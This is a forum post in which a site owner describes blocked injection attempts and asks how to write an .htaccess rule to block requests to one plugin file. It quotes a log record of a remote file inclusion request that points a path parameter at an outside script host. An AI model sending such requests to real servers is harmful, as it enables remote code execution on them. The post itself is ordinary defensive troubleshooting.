They are trying to use some type of injection / XSS - I don't know enough to determine exactly what but there are quite a few malicious looking commands on the pages that are embedded in the script.

I blocked them by accident because of my UA filters but if they change that and start using a standard browser UA they could probably get through. I’ve got my software vendor looking at their code to see if it is in fact vulnerable but in the meantime. . .

If anyone can give me some assistance with an .htaccess RewriteCond I would be very appreciative.

The URL they are referencing is one that a user would never see and should never show up.

A redacted sample log file record looks like:

200.61.229.110 - - [05/Nov/2006:00:06:55 -0500] "GET /utility/Subdirectory/Subdirectory2/Subdirectory2_Plugin_textarea.php?mosConfig_absolute_path=http://maliciousscriptdomain.ru/c.txt? HTTP/1.0" 403 - "-"

How would I construct a RewriteCond to block all references to "/Subdirectory2_Plugin_textarea.php"?

Thanks if you can help.

P.S. If you're interested in looking at the pages that contain the scripts send me a sticky note.